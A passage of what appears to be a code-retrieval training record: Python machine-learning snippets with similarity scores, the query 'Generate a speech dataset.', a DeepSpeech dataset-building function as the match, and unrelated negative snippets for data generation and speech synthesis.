range(len(arguments)):\n argumentString += arguments[i]\n if i != len(arguments) - 1:\n argumentString += \", \"\n \n outputFile.write('\\tdef __call__(self, ' + argumentString + '):\\n')\n outputFile.write(\"\\t\\treturn \" + functions[key].mathString.replace(\"^\", \"**\") + \"\\n\\n\")\n\n outputFile.close()", "def build_model(cfg, char_voca, word_voca=None, gazet=None, pos_voca=None):\n\n # Build Embedder\n embedder = Embedder(\n window=cfg.window,\n char_voca=char_voca,\n word_voca=word_voca,\n jaso_dim=cfg.jaso_dim,\n char_dim=cfg.char_dim,\n word_dim=cfg.word_dim,\n gazet=gazet,\n gazet_embed=True,\n pos_enc=True,\n phoneme=True,\n pos_voca_size=len(pos_voca),\n pos_dim=cfg.pos_dim)\n\n print('Total Embedding_size: ', embedder.embed_dim)\n\n\n encoder_name, decoder_name = cfg.model_name.lower().split('-')\n\n # Build Encoder\n if encoder_name == 'fnn5':\n encoder = models.Fnn5(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn7':\n encoder = models.Cnn7(in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name == 'cnn8':\n encoder = models.Cnn8(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n hidden_dim=cfg.hidden_dim)\n elif encoder_name in ['gru', 'lstm', 'sru']:\n encoder = models.RnnEncoder(context_len=cfg.context_len,\n in_dim=embedder.embed_dim,\n out_dim=cfg.hidden_dim,\n cell=encoder_name)\n else:\n raise ValueError('unknown model name: %s' % cfg.model_name)\n\n # Build Decoder\n if decoder_name.lower() == 'fc':\n decoder = models.FCDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags)\n elif decoder_name in ['gru', 'lstm', 'sru']:\n decoder = models.RnnDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags,\n num_layers=cfg.num_layers,\n cell=decoder_name)\n\n model = models.Ner(embedder, encoder, decoder)\n\n return model", "def model_fn(model_dir):\n \n model = resnet18Basic(num_classes=10)\n net.load_params('%s/model.params' % model_dir, ctx=mx.cpu())\n return net", "def __call__(self, x: Tensor, model: Module, gt_y: Tensor):\n prediction = model(x)\n return self.weight * self.norm(prediction, gt_y)", "def build_model(self):\n pass", "def build_model(self):\n pass", "def init_model(model_type):\n if model_type == 'magnitude':\n model = Magnitude('../model/crawl-300d-2M.magnitude')\n elif model_type == 'gensim':\n model = KeyedVectors.load('../model/pre_trained_word2vec_embeddings.bin')\n else:\n print(\"Invalid model type.\")\n sys.exit(1)\n return model, model_type", "def _parse_model(model: str, num_classes: int) -> Callable[[], tf.keras.Model]:\n if model == 'cnn':\n keras_model_builder = functools.partial(\n create_conv_dropout_model, num_classes=num_classes)\n elif model in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']:\n keras_model_builder = functools.partial(\n getattr(resnet_models, f'create_{model}'),\n input_shape=(28, 28, 1),\n num_classes=num_classes)\n else:\n raise ValueError(\n 'Cannot handle model flag [{!s}], must be one of {!s}.'.format(\n model, _EMNIST_MODELS))\n return keras_model_builder", "def model_fn(features, labels, mode, params): # pylint: disable=unused-argument\n\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n # INFO:tensorflow: name = input_ids, shape = (?, 180)\n # INFO:tensorflow: name = input_mask, shape = (?, 180)\n # INFO:tensorflow: name = is_real_example, shape = 
(?,)\n # INFO:tensorflow: name = label_ids, shape = (?,)\n # INFO:tensorflow: name = masked_lm_ids, shape = (?, 180)\n # INFO:tensorflow: name = masked_lm_positions, shape = (?, 180)\n # INFO:tensorflow: name = masked_lm_weights, shape = (?, 180)\n # INFO:tensorflow: name = segment_ids, shape = (?, 180)\n\n input_ids = features[\"input_ids\"]\n input_mask = features[\"input_mask\"]\n segment_ids = features[\"segment_ids\"]\n masked_lm_positions = features[\"masked_lm_positions\"]\n masked_lm_ids = features[\"masked_lm_ids\"]\n masked_lm_weights = features[\"masked_lm_weights\"]\n #next_sentence_labels = features[\"next_sentence_labels\"]\n \n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n model = modeling.BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_mask,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_one_hot_embeddings)\n \n gcn_embedding = build_gcn_output(adj_mat, w2n, n2w, model.get_embedding_table(), bert_config, is_training)\n \n (masked_lm_loss,\n masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(\n bert_config, model.get_sequence_output(), gcn_embedding,\n masked_lm_positions, masked_lm_ids, masked_lm_weights)\n\n\n masked_lm_loss = tf.identity(masked_lm_loss, name=\"masked_lm_loss\")\n\n\n total_loss = masked_lm_loss\n\n total_loss = tf.identity(total_loss, name='total_loss')\n\n tvars = tf.trainable_variables()\n\n initialized_variable_names = {}\n scaffold_fn = None\n if init_checkpoint and (not FLAGS.use_horovod or hvd.rank() == 0):\n (assignment_map, initialized_variable_names\n ) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n if use_tpu:\n\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n return tf.train.Scaffold()\n\n scaffold_fn = tpu_scaffold\n else:\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n if not FLAGS.use_horovod or hvd.rank() == 0:\n tf.logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape,\n init_string)\n\n output_spec = None\n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(\n total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu, FLAGS.use_horovod)\n\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n train_op=train_op)\n return output_spec\n elif mode == tf.estimator.ModeKeys.PREDICT:\n\n #def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,\n # masked_lm_weights):#, next_sentence_example_loss,\n #next_sentence_log_probs, next_sentence_labels):\n \"\"\"Computes the loss and accuracy of the model.\"\"\"\n #masked_lm_log_probs = tf.reshape(masked_lm_log_probs,\n # [-1, masked_lm_log_probs.shape[-1]])\n masked_lm_predictions = tf.argmax(\n masked_lm_log_probs, axis=-1, output_type=tf.int32)\n # values=next_sentence_example_loss)\n\n predictions = {\n \"input_ids\": tf.reshape(input_ids, [-1]),\n \"predictions\": masked_lm_log_probs\n }\n\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions)\n #eval_metric_ops=eval_metrics)\n return output_spec\n else:\n def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,\n masked_lm_weights):\n \"\"\"Computes the loss and accuracy of the model.\"\"\"\n masked_lm_log_probs = tf.reshape(masked_lm_log_probs,\n [-1, 
masked_lm_log_probs.shape[-1]])\n masked_lm_predictions = tf.argmax(\n masked_lm_log_probs, axis=-1, output_type=tf.int32)\n masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])\n masked_lm_ids = tf.reshape(masked_lm_ids, [-1])\n masked_lm_weights = tf.reshape(masked_lm_weights, [-1])\n masked_lm_accuracy = tf.metrics.accuracy(\n labels=masked_lm_ids,\n predictions=masked_lm_predictions,\n weights=masked_lm_weights)\n masked_lm_mean_loss = tf.metrics.mean(\n values=masked_lm_example_loss, weights=masked_lm_weights)\n\n return {\n \"masked_lm_accuracy\": masked_lm_accuracy,\n \"masked_lm_loss\": masked_lm_mean_loss,\n }\n\n eval_metrics = metric_fn(\n masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,\n masked_lm_weights)\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n eval_metric_ops=eval_metrics)\n\n return output_spec", "def model_fn_builder(model_config,\n train_params):\n def model_fn(features, labels, mode, params):\n \"\"\"The `model_fn` for TPUEstimator.\"\"\"\n logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n\n input_ids = features[\"input_ids\"]\n input_mask = features[\"input_mask\"]\n segment_ids = features[\"segment_ids\"]\n masked_lm_positions = features[\"masked_lm_positions\"]\n masked_lm_ids = features[\"masked_lm_ids\"]\n masked_lm_weights = features[\"masked_lm_weights\"]\n\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n model = getattr(models, model_config.model_name)(config=model_config,\n is_training=is_training)\n _ = model(input_ids, input_mask=input_mask, token_type_ids=segment_ids)\n\n # TODO (@zhaoshenjian.01): check conditional_jit_scope\n # split loss calculation across batch\n batch_splits = train_params.get(\"batch_splits\", 1)\n if batch_splits == 1:\n # sparse_softmax_cross_entropy_with_logits\n masked_lm_output_dict = get_masked_lm_output(model_config,\n model.get_sequence_output(),\n model.get_embedding_table(),\n masked_lm_positions,\n masked_lm_ids,\n masked_lm_weights)\n else:\n # use for large vocab\n masked_lm_output_dict = get_masked_lm_output_split_batch(\n model_config,\n model.get_sequence_output(),\n model.get_embedding_table(),\n masked_lm_positions,\n masked_lm_ids,\n masked_lm_weights,\n batch_splits=batch_splits)\n\n masked_lm_loss = masked_lm_output_dict[\"loss\"]\n\n use_nsp = train_params.get(\"use_nsp\", True)\n if use_nsp:\n next_sentence_labels = features[\"next_sentence_labels\"]\n next_sentence_output_dict = get_next_sentence_output(\n model_config, model.get_pooled_output(), next_sentence_labels)\n next_sentence_loss = next_sentence_output_dict[\"loss\"]\n else:\n next_sentence_loss = 0\n\n total_loss = masked_lm_loss + next_sentence_loss\n\n tvars = tf.compat.v1.trainable_variables()\n # run init\n init_checkpoint = train_params.get(\"init_checkpoint\")\n initialized_variable_names = {}\n scaffold_fn = None\n if init_checkpoint:\n (assignment_map,\n initialized_variable_names) = get_assignment_map_from_checkpoint(\n tvars, init_checkpoint)\n tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n def tpu_scaffold():\n tf.train.init_from_checkpoint(init_checkpoint,\n assignment_map)\n return tf.train.Scaffold()\n scaffold_fn = tpu_scaffold\n logging.info(\"**** Trainable Variables ****\")\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n logging.info(\" name = {}, shape = {} 
{}\".format(var.name, var.shape,\n init_string))\n\n # default `bert_decay` lr_scheduler\n lr_params = train_params.get(\n 'lr_scheduler', {\n 'name': 'bert_decay',\n 'learning_rate': 1e-4,\n 'warmup_steps': 10000,\n 'num_train_steps': 1000000\n })\n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op, _ = optimizers.create_optimizer(\n loss=total_loss,\n init_lr=lr_params['learning_rate'],\n num_train_steps=lr_params['num_train_steps'],\n num_warmup_steps=lr_params['warmup_steps'])\n\n output_spec = tf.contrib.tpu.TPUEstimatorSpec(mode=mode,\n loss=total_loss,\n train_op=train_op,\n scaffold_fn=scaffold_fn)\n return output_spec\n raise NotImplementedError\n\n return model_fn", "def deep_enhance(model: str = 'unet', quantized: bool = False, **kwargs):\n\n model = model.lower()\n if model not in _sampling_availability:\n raise ValueError(\n 'model not supported, please check supported models from `malaya_speech.speech_enhancement.available_deep_enhance()`.'\n )\n\n return unet.load_1d(\n model=model,\n module='speech-enhancement',\n quantized=quantized,\n **kwargs\n )", "def test_model():\n test_text = \"what is the price of jug?\"\n model = spacy.load(\"../model/custom_ner_model\")\n doc = model(test_text)\n for ent in doc.ents:\n print(ent.text, ent.start_char, ent.end_char, ent.label_)", "def predict_api():\n pass", "def __init__(self, model):\n TreeLikelihoodBase.__init__(self, model)", "def create_model(self, fun, kwargs=None, compile=True):\n if kwargs is None:\n kwargs = {}\n\n self.model = fun(self.config.inputs, self.config.output, **kwargs)\n if compile:\n self.model.compile(\n loss=self.config.get_loss(self.modeldir),\n optimizer=\"adam\", metrics=[\"accuracy\"])", "def create_model():\n\n class Net(nn.Cell):\n def construct(self, x, y):\n return x\n\n net = Net()\n model_simple = Model(net)\n\n return model_simple", "def model_fn(model_dir):\n ctx = mx.cpu()\n net = unet.Unet()\n print (\"Loading\", model_dir)\n if path.exists(model_dir+\"/unet_RGB.params\"):\n print (\"Loading RGB Model\")\n net.load_params(model_dir+\"/unet_RGB.params\", ctx)\n print (\"RGB Model Loaded\")\n \n elif path.exists(model_dir+\"/unet_ALL_BANDS.params\"):\n print (\"Loading ALL_BANDS Model\")\n net.load_params(model_dir+\"/unet_ALL_BANDS.params\", ctx)\n print (\"ALL_BANDS Model Loaded\")\n \n else:\n print (\"Model Missing\")\n net=None\n return (net)", "def create_model(self, input_shape, num_actions, mode, args, model_name='q_network'):\n assert (mode in (\"linear\", \"duel\", \"dqn\"))\n with tf.variable_scope(model_name):\n input_data = Input(shape=input_shape, name=\"input\")\n if mode == \"linear\":\n # #version 4 elu:\n # flatten_hidden = Flatten(name=\"flatten\")(input_data)\n # FC_1 = Dense(512, activation='elu', name='FC1-elu')(flatten_hidden)\n # FC_2 = Dense(512, activation='elu', name='FC2-elu')(FC_1)\n # FC_3 = Dense(512, activation='elu', name='FC3-elu')(FC_2)\n # FC_4 = Dense(512, activation='elu', name='FC4-elu')(FC_3)\n # output = Dense(num_actions, activation='elu', name=\"output\")(FC_4)\n\n #version 4 elu:\n flatten_hidden = Flatten(name=\"flatten\")(input_data)\n FC_1 = Dense(1024, activation='elu', name='FC1-elu')(flatten_hidden)\n FC_2 = Dense(1024, activation='elu', name='FC2-elu')(FC_1)\n FC_3 = Dense(1024, activation='elu', name='FC3-elu')(FC_2)\n FC_4 = Dense(512, activation='elu', name='FC4-elu')(FC_3)\n output = Dense(num_actions, activation='elu', name=\"output\")(FC_4)\n\n else:\n if not (args.recurrent):\n # # # version 1:\n # h1 = Convolution2D(32, (8, 8), 
strides=4, activation=\"relu\", name=\"conv1\")(input_data)\n # h2 = Convolution2D(64, (4, 4), strides=2, activation=\"relu\", name=\"conv2\")(h1)\n # h3 = Convolution2D(64, (3, 3), strides=1, activation=\"relu\", name=\"conv3\")(h2)\n # context = Flatten(name=\"flatten\")(h3)\n\n # # version 2:\n # conv1 = Convolution2D(1, (5, 5), strides=1, activation=\"elu\", name=\"conv1\")(input_data)\n # flatten = Flatten(name=\"flatten\")(conv1)\n # FC_2 = Dense(512, activation='elu', name='FC2-elu')(flatten)\n # context = Dense(512, activation='elu', name='FC4-elu')(FC_2)\n\n # version 3:\n conv1 = Convolution2D(32, (2, 2), strides=1, activation=\"relu\", name=\"conv1\")(input_data)\n flatten = Flatten(name=\"flatten\")(conv1)\n FC_2 = Dense(128, activation='relu', name='FC2-relu')(flatten)\n FC_3 = Dense(128, activation='relu', name='FC3-relu')(FC_2)\n context = Dense(128, activation='elu', name='FC4-elu')(FC_3)\n\n\n\n # else:\n # print('>>>> Defining Recurrent Modules...')\n # input_data_expanded = Reshape((input_shape[0], input_shape[1], input_shape[2], 1),\n # input_shape=input_shape)(input_data)\n # input_data_TimeDistributed = Permute((3, 1, 2, 4), input_shape=input_shape)(input_data_expanded)\n # h1 = TimeDistributed(Convolution2D(32, (8, 8), strides=4, activation=\"relu\", name=\"conv1\"), \\\n # input_shape=(args.num_frames, input_shape[0], input_shape[1], 1))(\n # input_data_TimeDistributed)\n # h2 = TimeDistributed(Convolution2D(64, (4, 4), strides=2, activation=\"relu\", name=\"conv2\"))(h1)\n # h3 = TimeDistributed(Convolution2D(64, (2, 2), strides=1, activation=\"relu\", name=\"conv3\"))(h2)\n # flatten_hidden = TimeDistributed(Flatten())(h3)\n # hidden_input = TimeDistributed(Dense(512, activation='relu', name='flat_to_512'))(flatten_hidden)\n # if not (args.a_t):\n # context = LSTM(512, return_sequences=False, stateful=False, input_shape=(args.num_frames, 512))(\n # hidden_input)\n # else:\n # if args.bidir:\n # hidden_input = Bidirectional(\n # LSTM(512, return_sequences=True, stateful=False, input_shape=(args.num_frames, 512)),\n # merge_mode='sum')(hidden_input)\n # all_outs = Bidirectional(\n # LSTM(512, return_sequences=True, stateful=False, input_shape=(args.num_frames, 512)),\n # merge_mode='sum')(hidden_input)\n # else:\n # all_outs = LSTM(512, return_sequences=True, stateful=False,\n # input_shape=(args.num_frames, 512))(hidden_input)\n # # attention\n # attention = TimeDistributed(Dense(1, activation='tanh'))(all_outs)\n # # print(attention.shape)\n # attention = Flatten()(attention)\n # attention = Activation('softmax')(attention)\n # attention = RepeatVector(512)(attention)\n # attention = Permute([2, 1])(attention)\n # sent_representation = merge([all_outs, attention], mode='mul')\n # context = Lambda(lambda xin: K.sum(xin, axis=-2), output_shape=(512,))(sent_representation)\n # # print(context.shape)\n\n if mode == \"dqn\":\n h4 = Dense(512, activation='elu', name=\"fc\")(context)\n output = Dense(num_actions, name=\"output\")(h4)\n # elif mode == \"duel\":\n # value_hidden = Dense(512, activation='relu', name='value_fc')(context)\n # value = Dense(1, name=\"value\")(value_hidden)\n # action_hidden = Dense(512, activation='relu', name='action_fc')(context)\n # action = Dense(num_actions, name=\"action\")(action_hidden)\n # action_mean = Lambda(lambda x: tf.reduce_mean(x, axis=1, keep_dims=True), name='action_mean')(\n # action)\n # output = Lambda(lambda x: x[0] + x[1] - x[2], name='output')([action, value, action_mean])\n model = Model(inputs=input_data, 
outputs=output)\n print(model.summary())\n return model", "def __init__(self, model: Model1D):\n self._model = model", "def initialize_module():\n global ngram_model\n ngram_model = load_model()" ]
[ "0.71115047", "0.60863584", "0.60634947", "0.6042872", "0.5957492", "0.589929", "0.5818367", "0.5788677", "0.5773995", "0.57248014", "0.57248014", "0.57248014", "0.57248014", "0.57248014", "0.57153296", "0.56870234", "0.5674797", "0.56720144", "0.5628486", "0.5593021", "0.5587657", "0.5580817", "0.5558203", "0.5535412", "0.5525206", "0.5516045", "0.5506121", "0.5460767", "0.54452455", "0.54422617", "0.54295236", "0.54209596", "0.5410969", "0.54049355", "0.5396264", "0.539459", "0.53930545", "0.53927827", "0.5392418", "0.5390946", "0.53904545", "0.53845423", "0.537284", "0.53671527", "0.536323", "0.53617424", "0.53508276", "0.5350179", "0.5345642", "0.53454566", "0.5344366", "0.5341592", "0.5318017", "0.5311294", "0.5308564", "0.5308564", "0.52997327", "0.5297424", "0.52960545", "0.5294392", "0.52641726", "0.5263245", "0.52616197", "0.52594227", "0.52517176", "0.5245395", "0.5245294", "0.5230041", "0.52047294", "0.52020514", "0.52020514", "0.5199654", "0.51952046", "0.519095", "0.51906884", "0.518922", "0.5187611", "0.51670766", "0.5164155", "0.5163744", "0.51562077", "0.51481414", "0.514741", "0.5144526", "0.51437473", "0.51437473", "0.5140816", "0.51354206", "0.5134463", "0.5118196", "0.51153934", "0.5110684", "0.5105568", "0.51007915", "0.5100038", "0.50994134", "0.50988096", "0.5096564", "0.5092942", "0.50899667" ]
0.5734031
9
Generate a speech dataset.
def generate_dataset(data_dir: str, partition: str) -> dataset.DeepSpeechDataset: global FLAGS audio_conf = dataset.AudioConfig( sample_rate=FLAGS.sample_rate, window_ms=FLAGS.window_ms, stride_ms=FLAGS.stride_ms, normalize=True) data_conf = dataset.DatasetConfig( audio_config=audio_conf, data_path=data_dir, vocab_file_path=FLAGS.vocab_file, sortagrad=FLAGS.sortagrad) speech_dataset = dataset.DeepSpeechDataset(dataset_config=data_conf, partition=partition, seed=FLAGS.seed) return speech_dataset
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def generateDataset(self):\n if self.outdir[-1] != \"/\": \n self.outdir += \"/\"\n self.outdir += \"dataset_trackml\"\n i = 1\n while os.path.exists(self.outdir):\n self.outdir.replace(\"_\"+str(i-1), \"\")\n self.outdir += (\"_\"+str(i))\n i += 1\n cmd = \"mkdir -p \"+ self.outdir\n os.system(cmd)\n\n cont = pc.particleController()\n cont.generateEvents(self.numevents, self.hpe, self.detectors)\n\n self.generateHits(cont)\n self.generateTruths(cont)\n self.generateSolution(cont)", "def generate_synth_data(n):", "def generate_dataset(self):\n\t\timg_set = []\n\t\tqa_set = []\n\t\tfor i in range(self.config.dataset_size):\n\t\t\timg, r = self.generate_image()\n\t\t\tq = self.generate_question()\n\t\t\ta = self.generate_answer(r, q)\n\t\t\timg_sample = {\n\t\t\t\t'id': i,\n\t\t\t\t'image': img.tolist()\n\t\t\t}\n\t\t\timg_set.append(img_sample)\n\t\t\tfor j in range(len(q)):\n\t\t\t\tqa_sample = {\n\t\t\t\t\t'id': i,\n\t\t\t\t\t'question': q[j].tolist(),\n\t\t\t\t\t'answer': a[j].tolist()\n\t\t\t\t}\n\t\t\t\tqa_set.append(qa_sample)\n\t\tprint('Finished creating smaples')\n\t\tdataset = {\n\t\t\t'image':\timg_set,\n\t\t\t'qa':\tqa_set\n\t\t}\n\t\twith open(self.path, 'w') as f:\n\t\t\tjson.dump(dataset, f)", "def generate_audio():\n text, lang = introduction()\n ses = boto3.Session(profile_name=\"default\")\n pol = ses.client(\"polly\")\n res = pol.synthesize_speech(Text=text, LanguageCode=lang, OutputFormat=\"mp3\", VoiceId=VOICE)\n return res", "def make_train_dataset(dataset_dir, speakers=None):\n training_dir = os.path.join(dataset_dir, 'vcc2018_training')\n evaluation_dir = os.path.join(dataset_dir, 'vcc2018_evaluation')\n if speakers is None:\n speakers = [speaker for speaker in os.listdir(training_dir)\n if speaker.startswith('VCC2') and\n os.path.isdir(os.path.join(training_dir, speaker))]\n\n resample = Resample(22050, 16000)\n create_spectrogram = Spectrogram(n_fft=N_FFT, hop_length=HOP_LEN)\n\n dataset = []\n with torch.no_grad():\n for c, speaker in enumerate(speakers):\n speaker_dir = os.path.join(training_dir, speaker)\n wav_files = [os.path.join(speaker_dir, wav_file)\n for wav_file in os.listdir(speaker_dir)\n if os.path.splitext(wav_file)[1] == '.wav']\n speaker_dir = os.path.join(evaluation_dir, speaker)\n wav_files.extend([os.path.join(speaker_dir, wav_file)\n for wav_file in os.listdir(speaker_dir)\n if os.path.splitext(wav_file)[1] == '.wav'])\n spectrogram = []\n for wav_file in wav_files:\n sound, _ = torchaudio.load(wav_file)\n sound = resample(sound)\n spectrogram.append(create_spectrogram(sound).squeeze(0))\n spectrogram = torch.cat(spectrogram, dim=1)\n\n hop_length = DATA_LEN // 4\n for n in range((spectrogram.size(1) - DATA_LEN) // hop_length + 1):\n start = n * hop_length\n data = spectrogram[:, start:start + DATA_LEN]\n label = torch.zeros(len(speakers))\n label[c] = 1\n dataset.append((data, label))\n\n return dataset", "def create_samples(self):\n for s_id in range(len(self.data[\"sample\"])):\n self.samples.add(Sample(s_id, [self.data[key][s_id] for key in self.data.keys() if key not in WRONG_KEYS],\n self.data[\"label\"][s_id]))", "def generate_samples(self, nsamples):\n assert self.trained, \"Model must first be fitted to some data.\"\n logger.debug(f'Generate synthetic dataset of size {nsamples}')\n synthetic_data, _ = self.gm.sample(nsamples)\n return synthetic_data", "def generate_synthetic_dataset(args):\n logger = logging.getLogger(\"GACM\")\n logger.info('Checking the data files...')\n for data_path in args.train_dirs + args.dev_dirs + 
args.test_dirs:\n assert os.path.exists(data_path), '{} file does not exist.'.format(data_path)\n assert len(args.test_dirs) > 0, 'No test files are provided.'\n dataset = Dataset(args, train_dirs=args.train_dirs, dev_dirs=args.dev_dirs, test_dirs=args.test_dirs)\n logger.info('Initialize the model...')\n model = Agent(args, len(dataset.qid_query), len(dataset.uid_url), len(dataset.vid_vtype))\n logger.info('model.global_step: {}'.format(model.global_step))\n assert args.load_model > -1\n logger.info('Restoring the model...')\n model.load_model(model_dir=args.load_dir, model_prefix=args.algo, global_step=args.load_model, load_optimizer=False)\n\n synthetic_types = ['deterministic', 'stochastic']\n shuffle_splits = [None, [1, 11], [1, 6, 11]]\n amplifications = [1, 7]\n for synthetic_type in synthetic_types:\n for shuffle_split in shuffle_splits:\n for amplification in amplifications:\n #synthetic_type = 'deterministic'\n #shuffle_split = None\n #amplification = 1\n file_path = os.path.join(args.load_dir, '..', 'synthetic')\n model.generate_synthetic_dataset('test', dataset, file_path, \n 'synthetic_{}_{}_{}.txt'.format(synthetic_type[0].upper(), str(shuffle_split), amplification), \n synthetic_type=synthetic_type, shuffle_split=shuffle_split, amplification=amplification)\n # exit()\n logger.info('Done with click sequence generation.')", "def generate(size, data_dim=5, n_phrase_labels=4, n_words=3,\n n_phrase_words=3, n_phrases=5, label_noise=0.,\n min_sent_len=5, max_sent_len=5, tag_end=True):\n assert n_words < 256\n assert max_sent_len >= n_phrase_words\n global dictionary, phrases\n\n # generate dictionary\n dictionary = uniform(-1.0, 1.0, size=(n_words, data_dim))\n\n # generate n_phrases unique word sequences of length n_phrase_words\n print \"Generating %d phrases\" % n_phrases\n phrases = []\n phrase_labels = []\n while len(phrases) != n_phrases:\n phrases = np.unique(np.array([\"\".join(map(chr, randint(n_words, size=n_phrase_words)))\n for i in xrange(n_phrases)], dtype=np.object))\n assert np.unique(map(len, phrases)) == n_phrase_words\n phrase_labels = 1+randint(n_phrase_labels-1, size=n_phrases)\n\n # generate 'sentences'\n print \"Generating %d sentences\" % sum(size)\n Xind = []\n Y = []\n for i in xrange(sum(size)):\n while True:\n sent_len = randint(min_sent_len, max_sent_len+1)\n sent = \"\".join(map(chr, randint(n_words, size=sent_len)))\n if contains_any_phrase(sent, phrases):\n print \".\",\n break\n Y.append(np.zeros(sent_len,dtype=np.int))\n Xind.append(sent)\n\n # generate labels for dataset\n print \"Generating labels for the sentences...\"\n for phrase, plabel in zip(phrases, phrase_labels):\n for idx, sent in enumerate(Xind):\n start = 0\n while True:\n sidx = sent.find(phrase, start)\n if sidx < 0:\n break\n if tag_end:\n Y[idx][sidx+len(phrase)-1] = plabel\n else:\n Y[idx][sidx] = plabel\n start += 1\n\n print \"Trafo...\"\n # transform dataset to code\n if data_dim > 1:\n X = [[dictionary[ord(c)] for c in sent] for sent in Xind]\n else:\n X = [[ord(c) for c in sent] for sent in Xind]\n\n Xtrain, Xtest = X[:size[0]], X[size[0]:]\n Ytrain, Ytest = Y[:size[0]], Y[size[0]:]\n\n # training label noise\n for sent in Ytrain:\n mask = uniform(size=sent.size) < label_noise\n sent[mask] = randint(n_phrase_labels, size=mask.sum())\n print \"Done.\"\n\n return Xtrain, Xtest, Ytrain, Ytest", "def generate_dataset(num_sequences=2**8):\n samples = []\n \n for _ in range(num_sequences): \n num_tokens = np.random.randint(1, 12)\n sample = ['a'] * num_tokens + ['b'] * num_tokens 
+ ['EOS']\n samples.append(sample)\n \n return samples", "def load_synthesizer_dataset(sentences):\n return TFRecordDataset([path.join(TFRSDIR, sentence+'.tfr')\n for sentence in sentences])\\\n .map(\n lambda record: \\\n tf.parse_single_example(\n record,\n features={\n 's': tf.FixedLenFeature([], tf.string),\n 'l': tf.FixedLenFeature([NL+9], tf.float32),\n 'a': tf.FixedLenFeature([NA], tf.float32)\n }\n )\n )\\\n .map(\n lambda feature: (feature['l'], feature['s'], feature['a'])\n )", "def create_dataset(n_examples):\n \n human_vocab = set()\n machine_vocab = set()\n dataset = []\n\n for i in tqdm(range(n_examples)):\n h, m, _ = create_date()\n if h is not None:\n dataset.append((h, m))\n human_vocab.update(tuple(h))\n machine_vocab.update(tuple(m))\n\n human = dict(zip(list(human_vocab) + ['<unk>', '<pad>'], \n list(range(len(human_vocab) + 2))))\n inv_machine = dict(enumerate(list(machine_vocab) + ['<unk>', '<pad>']))\n machine = {v:k for k,v in inv_machine.items()}\n \n return dataset, human, machine, inv_machine", "def create_samples(self):\n self._samples = self.load_samples()\n self.modify_samples()", "def peoples_speech(\n corpus_dir: Pathlike,\n output_dir: Pathlike,\n):\n prepare_peoples_speech(\n corpus_dir,\n output_dir=output_dir,\n )", "def create_data_response(speech: str) -> str:\n\n data = {\n \"speech\": speech,\n \"displayText\": speech,\n \"source\": \"pirka-chatbot-webserver\"\n }\n return data", "def generate_samples(self, n_samples):", "def generate_samples(self, n_samples):", "def samples(self):\n pass", "def inference(self):\n embeddings = self.process_speaker(speaker_speech_path=self.main_configs.SPEAKER_SPEECH_PATH)\n with open(self.main_configs.INPUT_TEXTS_PATH, \"r\") as file:\n texts = file.readlines()\n specs = self.synthesize_spectrograms(texts=texts, embeddings=embeddings)\n specs = specs[0]\n wav = self.generate_waveform(specs)\n return wav", "def get_speech(self, phrase):\n src = os.path.join(constants.CONFIG_PATH, self.voice)\n text = phrase\n\n def preprocess(syllables):\n temp = []\n for syllable in syllables:\n for p in self.punctuation:\n syllable = syllable.replace(p, \"\")\n if syllable.isdigit():\n syllable = atc.num2chinese(syllable)\n new_sounds = lazy_pinyin(syllable, style=pypinyin.TONE3)\n for e in new_sounds:\n temp.append(e)\n else:\n temp.append(syllable)\n return temp\n \n if not os.path.exists(src):\n logger.error('{} 合成失败: 请先下载 syllables.zip (https://sourceforge.net/projects/hantts/files/?source=navbar) 并解压到 ~/.wukong 目录下'.format(self.SLUG))\n return None\n logger.debug(\"{} 合成中...\".format(self.SLUG))\n delay = 0\n increment = 355 # milliseconds\n pause = 500 # pause for punctuation\n syllables = lazy_pinyin(text, style=pypinyin.TONE3)\n syllables = preprocess(syllables)\n \n # initialize to be complete silence, each character takes up ~500ms\n result = AudioSegment.silent(duration=500*len(text))\n for syllable in syllables:\n path = os.path.join(src, syllable+\".wav\")\n sound_file = Path(path)\n # insert 500 ms silence for punctuation marks\n if syllable in self.punctuation:\n short_silence = AudioSegment.silent(duration=pause)\n result = result.overlay(short_silence, position=delay)\n delay += increment\n continue\n # skip sound file that doesn't exist\n if not sound_file.is_file():\n continue\n segment = AudioSegment.from_wav(path)\n result = 